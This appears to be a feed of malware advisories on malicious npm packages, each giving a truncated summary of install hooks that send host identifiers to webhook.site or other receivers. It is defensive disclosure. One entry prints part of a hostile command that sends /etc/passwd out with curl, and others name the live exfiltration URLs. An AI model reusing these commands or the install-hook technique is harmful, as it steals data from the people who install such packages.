MAL-2026-5486 Malicious code in menu-filter-widget-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bed4a7ece362ef59f2b621b3f64d06e899740c8ca8d73e437145d48b960187ce package.json declares a postinstall lifecycle hook that runs callback.js on every npm install. callback.js reads os.hostname and sends it to a...

MAL-2026-5469 Malicious code in getd-transactional-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fe5e89f2411faf9265508a84772d5667bb3095cf28937bb9e9ab80a215ff4208 On npm install, postinstall.js issues an HTTPS GET to https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5 carrying os.hostname,...

MAL-2026-5471 Malicious code in getd-ui-library (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fcdbf66757b102ed524f01c498adae819b02968aa455f57316f4e08af1fb9ea0 On npm install, postinstall.js runs unconditionally scripts.postinstall = 'node postinstall.js' and sends an HTTPS GET to a hardcoded webhook.site UR...

Malicious code in getd-web-corporativa (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6751d3ca04c2ae596f7e809e339770edaed576060d361c061311960b0a3a7033 On npm install, postinstall.js performs an HTTPS GET to a hardcoded webhook.site receiver, leaking the installer's hostname, OS username, platform,...

MAL-2026-5472 Malicious code in getd-web-corporativa (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6751d3ca04c2ae596f7e809e339770edaed576060d361c061311960b0a3a7033 On npm install, postinstall.js performs an HTTPS GET to a hardcoded webhook.site receiver, leaking the installer's hostname, OS username, platform,...

Malicious code in ipy-rev-proxy (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 591a0d253aee02115544f9bcac7609e62d8c18a9ac60cc4967d7d6e8c7f7d555 On npm install, index.js runs as a preinstall hook and POSTs hostname, username, platform, architecture, cwd, CI flags, and npm user-agent to...

MAL-2026-5464 Malicious code in db-xorma (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1428486c71a3cd7d89ea90a17631bb5dc0fee7e11a6cbb4d8029a8b25268c7d2 db-xorma advertises itself as a reactive in-memory database library. When a consumer creates any Model instance the documented entry point, the...

MAL-2026-5459 Malicious code in @dktunited/anly-tracker-v2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a8893b914c3ba3139a3c8cede191521742237aa7c1c5d64f7ee45dbc5f636a6 scripts/postinstall.js runs unconditionally during npm install and exfiltrates installer-side identifiers to an attacker-controlled out-of-band...

Malicious code in checkout-signer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f6add4dfcaaf79ce107ac8026032b47540def183a121be2266891644c90f10c8 Package replicates the API surface of an internal Exodus package generateMnemonicSigningKeys, signDirectPaymentMultiChain, signCapture, signRefund,...

Malicious code in @nstrlabs/utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 36d8d7c327560bb7a4c08d906db240a2dc146e20f828d9dfc5ab79497b155355 On npm install, the package's preinstall script node index.js || true executes automatically and collects host identifiers from the installer's machi...

Malicious code in @klapp-kyc/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ca32e3aa7685d93e36eca726e08096bd0c5ba425172ef254fdf769cc09b46887 On npm install, the package's preinstall hook executes node index.js, which collects the installer's hostname, OS username, current working directory...

MAL-2026-5414 Malicious code in @klapp-login-platform/oidc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6c2b86b9675d4d22e101f4f10f521cc36069ecebd1680d4c3ecfa0c04e8169da On npm install, the package executes node index.js via its preinstall hook. index.js collects the installer's hostname os.hostname, username...

Malicious code in @klapp-login-platform/native-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3b3bc8633d15b44abc90074d3362fd9399f53d10a88e24264caee9d924a72bb6 On npm install, the package's preinstall lifecycle hook runs node index.js, which collects installer-side identifiers — os.hostname,...

MAL-2026-5454 Malicious code in ui-ng-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 198750c8e5d6f4d8a3f3f788a2fd9286f43b5a447bb0e3495b50663c44ddd2a7 Package [email protected] is an empty shell index.js exports , no author, no description, no functionality with a single dependency declared as...

MAL-2026-5453 Malicious code in tivo-codelib-a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c187e845e4c0d637709021a287c758e0206cb7adc46517391df4724d8af8cb7 [email protected] is an empty-stub npm package whose index.js exports module.exports = and whose package metadata description, author is blank. I...

MAL-2026-5451 Malicious code in privacy-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969 [email protected] is a hollow wrapper index.js is module.exports = , blank description, blank author whose sole runtime dependency is declared as a...

MAL-2026-5409 Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

MAL-2026-5430 Malicious code in @sourceflow-uk/sourceflow-tracker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/packuxfoundry.tgz — a...

Malicious code in comos-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ee12368f5942eae69ed49370445277dace5431f4ded5556b51dcd1ef34bd4b4a Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-5405 Malicious code in comos-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ee12368f5942eae69ed49370445277dace5431f4ded5556b51dcd1ef34bd4b4a Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...